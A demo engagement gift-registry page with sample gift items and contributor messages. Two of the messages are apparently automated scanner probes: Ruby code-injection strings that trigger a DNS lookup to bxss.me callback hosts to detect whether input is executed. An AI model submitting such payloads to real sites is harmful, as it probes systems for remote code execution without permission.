Demo Engagement Registry
No contributions yet 2063 days to go
This is a demo engagement gift registry which you can use to see how it might look for your event.
Feel free to make a contribution, the system will not ask for your credit card details so you can simulate the entire experience from your guests point of view.

Funky named pillows
Pillows with our names on them which magically appear when you touch them!
3 contributions

Funny couples T-shirts
This will be fun when we're out in public together.
282 contributions

1 Night Luxury Hotel Stay
Planning the wedding will be stressful. Help us relax a little!
4 contributions
$15 remaining

Help us celebrate this special event!
3 contributions

FridgeHis and Hers bed linen
This is funny, but also accurate. So let's just make it official with the bed linen!
0 contributions
$250 remaining

Couples sport jersey
We can wear these when we go to the game together!
15 contributions

Couples Photoshoot
We're going to have a photoshoot to make some nice wall photos as a couple
5 contributions

Couples Relaxation Spa Day
Help us relax as we go through the stressful task of planning the wedding!
384 contributions
Messages from contributors
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“‘+’A’.concat(70-3).concat(22*4).concat(120).concat(80).concat(114).concat(66)+(require’socket’ Socket.gethostbyname(‘hitzv’+’tflmylrt3959d.bxss.me.’)[3].to_s)+’”
““+”A”.concat(70-3).concat(22*4).concat(103).concat(67).concat(102).concat(84)+(require”socket” Socket.gethostbyname(“hitlm”+”urtqfgzi8a76a.bxss.me.”)[3].to_s)+””
“Happy wedding”
“Happy engagement guys, enjoy the joyful time. So fun planning a wedding, having the wedding and getting ready for life. Love the registry idea so you can get a gift you want! ”
“Happy engagement ”
“Hope you enjoy this gift on us, and remember your dorky couples t-shirts for years to come! Love that I could easily contribute to this wedding gift for you online from another state. Genius! ”
“Good luck”
“Happy days ”
“Make Marriages great again.”
“Enjoy the gift guys!”